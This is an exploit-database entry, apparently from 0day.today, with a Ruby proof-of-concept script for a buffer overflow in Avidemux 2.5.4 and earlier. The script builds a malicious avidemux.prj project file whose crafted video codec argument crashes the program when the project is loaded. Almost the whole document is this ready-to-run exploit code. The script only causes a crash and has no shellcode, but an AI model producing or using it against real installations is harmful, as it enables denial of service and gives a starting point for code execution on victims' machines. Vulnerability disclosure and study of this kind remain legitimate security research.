Avidemux <= 2.5.4 Buffer Overflow Vulnerability

===============================================
Avidemux <= 2.5.4 Buffer Overflow Vulnerability
===============================================

#!/usr/bin/env ruby
# avidemux_crash.rb
#
# Title     :   Avidemux <= 2.5.4 Buffer Overflow PoC
# Date      :   31.10.2010
# Version   :   <= 2.5.4
# Software Link :   http://avidemux.sourceforge.net/download.html / http://avidemux.razorbyte.com.au/
# Author    :   [email protected]
# Email     :   the_unknown [at] group51 [dot] org
# Homepage  :   http://group51.org
# Tested on :   openSUSE 11.3 and Windows XP SP3 English
#
# Usage:
#   ruby avidemux_crash.rb <a *.mpg file>
#   Start Avidemux --> Load/Run Project --> crash!!
#
# Note:
#   You can also use another video file format you would have to change the Format in Line and maybe some other stuff #54 too
#
 
file = ARGV[0]
 
if file.nil?
    puts "Usage: ruby #{__FILE__} <path to sample video .mpg file>"
    exit
end
name = "avidemux.prj"
 
text = "//AD  <- Needed to identify//\n" +
"//--automatically built--\n"+
"var app = new Avidemux();\n"+
"//** Video **\n"+
"// 01 videos source \n"+
"app.load(\"#{file}\");\n"+
"//01 segments:\n"+
"app.clearSegments();\n"+
"app.addSegment(0,0,157699);\n"+
"app.markerA=0;\n"+
"app.markerB=77543;\n"+
"app.rebuildIndex();\n"+
"//** Postproc **\n"+
"app.video.setPostProc(3,3,0);\n"+
"app.video.fps1000 = 25000;\n"+
"//** Filters **\n"+
"//** Video Codec conf **\n"+
"app.video.codec(\"Copy\", \"CQ=4\", \"200 \"); \n"+ # <-- here is the vuln app.video.codec("Copy","CQ=4","0 ");
"//** Audio **\n"+
"app.audio.reset();\n"+
"app.audio.codec(\"copy\",-1078515528,0,\"\");\n"+
"app.audio.normalizeMode=0;\n"+
"app.audio.normalizeValue=0;\n"+
"app.audio.delay=0;\n"+
"app.audio.mixer=\"NONE\";\n"+
"app.setContainer(\"AVI\");\n"+
"setSuccess(1);\n"+
"//app.Exit();\n"+
"//End of script"
 
File.open(name, "w") do |f|
    f.puts(text)
end
 
puts "File #{name} has been created successfully"



#  0day.today [2018-01-26]  #